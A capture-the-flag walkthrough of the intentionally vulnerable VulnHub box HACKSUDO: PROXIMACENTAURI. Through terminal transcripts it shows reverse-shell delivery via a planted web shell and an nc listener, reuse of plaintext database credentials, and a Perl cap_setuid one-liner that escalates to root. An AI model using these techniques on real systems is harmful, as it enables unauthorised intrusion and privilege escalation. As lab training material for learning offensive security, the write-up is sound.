Vulnhub: HACKSUDO: PROXIMACENTAURI

HACKSUDO: PROXIMACENTAURI

This is HACKSUDO: PROXIMACENTAURI from VulnHub.

Box created by hacksudo team members vishal Waghmare , Soham Deshmukh This box should be easy to medium . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh) and Website (https://hacksudo.com)

Let’s go.

Ports

HTTP only. Well, I guess we won’t waste much time eh?

HTTP

┌──(root💀kali)-[/opt/vulnhub/proxmicenturi]
└─# feroxbuster -u http://192.168.1.242 -w /usr/share/seclists/Discovery/Web-Content/common.txt

This gets quite a few things, but the interesting one we find is at http://192.168.1.242/data/trash/files/:

[PARENTDIR]	Parent Directory	 	- 	 
[ ]	shell.phar	2021-06-04 23:43 	17K

Wait, what?

http://192.168.1.242/data/trash/files/shell.phar

Yep, the box has a shell on it for us. I use it to upload a shell of my own and get a reverse shell. Erm, yeah.

┌──(root💀kali)-[/opt/vulnhub/proxmicenturi]
└─# updog        
[+] Serving /opt/vulnhub/proxmicenturi...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)
192.168.1.242 - - [18/Jun/2021 07:49:49] "GET /shell.sh HTTP/1.1" 200 -
^C
[!] Exiting!
                                                                                                                                                                            
┌──(root💀kali)-[/opt/vulnhub/proxmicenturi]
└─# nc -nvlp 1234                                                                                                                                                       1 ⨯
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.242] 38168
bash: cannot set terminal process group (542): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ProximaCentauri:/dev/shm$ python3 -c 'import pty;pty.spawn("/bin/bash");'
<hm$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@ProximaCentauri:/dev/shm$ sudo -l
sudo -l
bash: sudo: command not found

The rest is just enumeration.

Proxima

www-data@ProximaCentauri:/usr/lib/systemd/system$ file /var/backups/mysql.bak
file /var/backups/mysql.bak
/var/backups/mysql.bak: PHP script, ASCII text
www-data@ProximaCentauri:/usr/lib/systemd/system$ cat /var/backups/mysql.bak
cat /var/backups/mysql.bak
<?php
/**
 * The base configuration for WordPress
# snip

There’s no wordpress on this box though? There are creds:

/** MySQL database username */
define( 'DB_USER', 'alfauser' );

/** MySQL database password */
define( 'DB_PASSWORD', 'passw0rd' );

Better try it:

www-data@ProximaCentauri:/usr/lib/systemd/system$ mysql -u alfauser -p
mysql -u alfauser -p
Enter password: passw0rd

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 39
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| proximacentauri    |
+--------------------+
4 rows in set (0.003 sec)

MariaDB [(none)]> use proximacentauri
use proximacentauri
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [proximacentauri]> show tables;
show tables;
+---------------------------+
| Tables_in_proximacentauri |
+---------------------------+
| authors                   |
+---------------------------+
1 row in set (0.000 sec)

MariaDB [proximacentauri]> select * from authors;
select * from authors;
+------+---------+-----------------+---------------------+
| id   | name    | password        | email               |
+------+---------+-----------------+---------------------+
|    1 | proxima | alfacentauri123 | [email protected] |
+------+---------+-----------------+---------------------+
1 row in set (0.000 sec)

MariaDB [proximacentauri]> quit
quit
Bye

Does this work?

www-data@ProximaCentauri:/usr/lib/systemd/system$ su proxima
su proxima
Password: alfacentauri123

proxima@ProximaCentauri:/usr/lib/systemd/system$ sudo -l
sudo -l
bash: sudo: command not found

Linpeas gives us this:

Files with capabilities (limited to 50):
/home/proxima/proximaCentauriA/perl = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep

And we use it:

proxima@ProximaCentauri:~/proximaCentauriA$ ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
<OSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id;hostname;date
id;hostname;date
uid=0(root) gid=1001(proxima) groups=1001(proxima)
ProximaCentauri
Fri 18 Jun 2021 08:35:00 AM EDT
# cat /root/root.txt
cat /root/root.txt
proxima centauri -----> 
                                            ,:
                                          ,' |
                                         /   :
                                      --'   /
                                      \/ /:/
                                      / ://_\
                                   __/   /
                                   )'-. /
                                   ./  :\
                                    /.' '
                                  '/'
                                  +
                                 '
                               `.
                           .-"-
                          (    |
                       . .-'  '.
                      ( (.   )8:
                  .'    / (_  )
                   _. :(.   )8P  `
               .  (  `-' (  `.   .
                .  :  (   .a8a)
               /_`( "a `a. )"'
           (  (/  .  ' )=='
          (   (    )  .8"   +
            (`'8a.( _(   (
         ..-. `8P    ) `  )  +
       -'   (      -ab:  )
     '    _  `    (8P"Ya
   _(    (    )b  -`.  ) +
  ( 8)  ( _.aP" _a   \( \   *
+  )/    (8P   (88    )  )
   (a:f   "     `"`
you rooted this server
root flag{e2798af12a7a0f4f70b4d69efbc25f4d}
# 

And it’s bedtime.